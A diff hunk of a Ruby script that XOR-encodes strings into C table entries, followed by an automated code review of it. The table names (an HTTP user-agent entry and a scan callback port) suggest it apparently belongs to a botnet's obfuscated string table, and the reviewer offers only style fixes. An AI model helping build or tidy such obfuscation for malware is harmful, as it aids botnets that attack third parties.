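+TABLE_HTTP_FIVE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x6f\x43\x41\x4b\x4c\x56\x4d\x51\x4a\x19\x02\x6b\x4c\x56\x47\x4e\x02\x6f\x43\x41\x02\x6d\x71\x02\x7a\x02\x13\x12\x7d\x13\x13\x7d\x14\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x14\x12\x13\x0c\x15\x0c\x15\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x74\x47\x50\x51\x4b\x4d\x4c\x0d\x1b\x0c\x13\x0c\x10\x02\x71\x43\x44\x43\x50\x4b\x0d\x14\x12\x13\x0c\x15\x0c\x15\x22"
+}
+hashtable.each { |key, value|
+decode_value = []
+value.each_byte { |bite| decode_value << "\\x%02x" % (bite ^ 0x22) }
+puts "add_entry(#{key}, \"#{decode_value.join}\", #{value.length});"
+}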
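Review bot: The length printed on the `puts` line is `value.length`, a character count, while the number it feeds into the generated `add_entry(...)` call sits next to a byte string; the two only agree here because Ruby counts each invalid high byte (the `\x99\xc7` of `TABLE_SCAN_CB_PORT`) as one character, so `#{value.bytesize}` states the intent directly and stays correct if the file ever gains an encoding comment. The `0x22` on the `each_byte` line is a magic constant: hoist it to a named `KEY = 0x22` with a comment such as `# single-byte XOR key; every table value ends in \x22, which decodes to the NUL terminator that the emitted length includes`, since every value in `hashtable` visibly ends with `\x22`. The loop variable `bite` would read better as `byte`. The rendered page appears to have dropped one blank line of the 58 the hunk header announces.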